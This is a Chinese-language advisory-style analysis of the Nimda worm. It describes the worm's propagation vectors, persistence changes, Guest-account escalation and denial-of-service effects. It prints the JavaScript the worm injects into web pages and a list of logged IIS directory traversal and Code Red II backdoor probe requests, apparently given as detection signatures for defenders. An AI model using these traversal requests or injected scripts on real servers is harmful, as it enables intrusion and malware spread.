Nimda蠕蟲病毒介紹
該病毒會通過email傳播,當用戶郵件的正文為空,似乎沒有附屬檔案,實際上郵件中嵌入了病毒的執行代碼,當用戶用OUTLOOK、OUTLOOK EXPRESS(沒有安裝微軟的補丁包的情況下)收郵件,在預覽郵件時,病毒就已經不知不覺中執行了。病毒執行時會將自己複製到臨時目錄,再運行在臨時目錄中的副本。病毒還會在windows的system目錄中生成load.exe檔案,同時修改system.ini中的shell從shell=explorer.exe改為explorer.exe load.exe -dontrunold,使病毒在下次系統啟動時仍然被激活。另外,在system目錄下,病毒還會生成一個副本:riched20.dll。為了通過郵件將自己傳播出去,病毒使用了MAPI函式讀取用戶的email並從中讀取SMTP地址和email地址。另外,病毒運行時會利用ShellExcute執行系統中的一些命令如:NET.EXE、USER.EXE、SHARE.EXE等命令,將Guest用戶添加到Guests、Administrators組(針對NT/2000/XP),並激活Guest用戶。還將C糟根目錄共享出來。
影響系統
Windows95, 98,ME,NT 和2000 所有客戶端和伺服器系統傳播方式
* 通過電子郵件從一個客戶端感染另一個客戶端* 通過開放的網路共享從一個客戶端感染另一個客戶端
* 通過瀏覽被感染的網站從Web 伺服器感染客戶端
* 通過主動掃描或利用 “Microsoft IIS 4.0 / 5.0 directory traversal”的缺陷”從客戶端感染Web 伺服器
* 通過掃描 “Code Red” (IN-2001-09),和 “sadmind/IIS” (CA-2001-11) 留下的後門從客戶端感染Web 伺服器
影響
感染Nimda 病毒的機器會不斷向Windows 的地址薄中的所有的郵件傳送攜帶了Nimda病毒的郵件的拷貝。
同樣的,客戶端機器會掃描有漏洞的IIS 伺服器。Nimda 會搜尋以前的IIS蠕蟲病毒留下的後門:Code Red II [IN-2001-09] 和 sadmind/IIS worm [CA-2001-11]; 它也試圖利用IIS Directory Traversal 漏洞 (VU #111677)。
初步分析表明, 該病毒除了改變網頁的目錄以繁衍自身外沒有其它破壞性的行為。但通過大量傳送電子郵件和掃描網路可以導致網路的“拒絕服務”(DoS)。
分析
被感染的機器會傳送一份Nimda病毒代碼複本到任何在掃描中發現有漏洞的伺服器。一旦在該伺服器上運行,蠕蟲就會遍歷系統里的每一個目錄(甚至包括所有通過已分享檔案可以讀取得目錄),然後會在磁碟里留下一份自身拷貝,取名為"README.EML"。一旦找到了含有web內容的目錄(包含html或asp檔案),下面Javascript代碼段就會被添加到每一個跟web有關的檔案中:
<script language="JavaScript">Window.Open("readme.eml", null,
"resizable=no,top=6000,left=6000")
</script>
這段代碼使得蠕蟲可以進一步繁衍,通過瀏覽器或瀏覽網路檔案感染到新的客戶端。
通過瀏覽器傳播
作為感染過程的一部分,Nimda 更改所有的含有web內容的檔案(象 .htm, ,html, .asp 等檔案)。這樣,任何用戶瀏覽該檔案,不管是通過瀏覽器還是網路,就可能會下載一份該病毒。有些瀏覽器會自動的執行下載動作,感染正在瀏覽該網站的機器。
通過檔案系統感染
Nimda病毒生成大量的自身的複本,取名為README.EML, 寫到該用戶有可寫許可權的目錄里。如果在另一台機器的用戶通過網路共享選取病毒檔案,並且設定了預覽功能的話,蠕蟲就會威脅到這台新的機器。
系統記錄
對任何開放80/tcp連線埠的web伺服器,Nimda蠕蟲的掃描會生成下面的日誌:
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\
x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
註:這個例子的前四行表明在試圖連線Red Code II 留下的後門,例子的其餘部分在試圖利用Directory Traversal 漏洞。
